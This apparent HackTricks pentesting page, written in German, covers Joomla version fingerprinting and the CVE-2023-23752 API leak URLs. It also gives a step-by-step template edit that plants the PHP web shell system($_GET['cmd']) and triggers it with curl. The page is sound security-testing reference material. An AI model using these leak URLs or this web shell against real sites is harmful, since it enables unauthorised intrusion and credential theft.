Joomla
Last updated
Last updated
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Joomla sammelt einige anonyme Nutzungsstatistiken, wie die Verteilung der Joomla-, PHP- und Datenbankversionen sowie der verwendeten Serverbetriebssysteme in Joomla-Installationen. Diese Daten können über ihre öffentliche API abgefragt werden.
Überprüfen Sie die Meta
robots.txt
README.txt
In /administrator/manifests/files/joomla.xml können Sie die Version sehen.
In /language/en-GB/en-GB.xml können Sie die Version von Joomla abrufen.
In plugins/system/cache/cache.xml können Sie eine ungefähre Version sehen.
In 80,443 - Pentesting Web Methodology ist ein Abschnitt über CMS-Scanner, die Joomla scannen können.
Versionen von 4.0.0 bis 4.2.7 sind anfällig für unauthentifizierte Informationsoffenlegung (CVE-2023-23752), die Anmeldeinformationen und andere Informationen ausgibt.
Benutzer: http://<host>/api/v1/users?public=true
Konfigurationsdatei: http://<host>/api/index.php/v1/config/application?public=true
MSF-Modul: scanner/http/joomla_api_improper_access_checks
oder Ruby-Skript: 51334
Sie können dieses Skript verwenden, um zu versuchen, sich mit Brute-Force in das Login einzuloggen.
Wenn Sie es geschafft haben, Admin-Anmeldeinformationen zu erhalten, können Sie RCE darin erreichen, indem Sie einen Ausschnitt von PHP-Code hinzufügen, um RCE zu erlangen. Wir können dies tun, indem wir ein Template anpassen.
Klicken Sie auf Templates
unten links unter Configuration
, um das Template-Menü zu öffnen.
Klicken Sie auf einen Template-Namen. Wählen wir protostar
unter der Spaltenüberschrift Template
. Dies bringt uns zur Seite Templates: Customise
.
Schließlich können Sie auf eine Seite klicken, um den Seitenquelltext anzuzeigen. Wählen wir die error.php
-Seite. Wir fügen eine PHP-Einzeiler hinzu, um Codeausführung zu erlangen wie folgt:
system($_GET['cmd']);
Speichern & Schließen
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Joomla-Ausnutzungsskript, das XSS zu RCE oder anderen kritischen Schwachstellen erhöht. Für weitere Informationen siehe diesen Beitrag. Es bietet Unterstützung für Joomla-Versionen 5.X.X, 4.X.X und 3.X.X und ermöglicht:
Privilegieneskalation: Erstellt einen Benutzer in Joomla.
(RCE) Eingebaute Templates bearbeiten: Bearbeitet eingebaute Templates in Joomla.
(Custom) Benutzerdefinierte Exploits: Benutzerdefinierte Exploits für Drittanbieter-Joomla-Plugins.
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)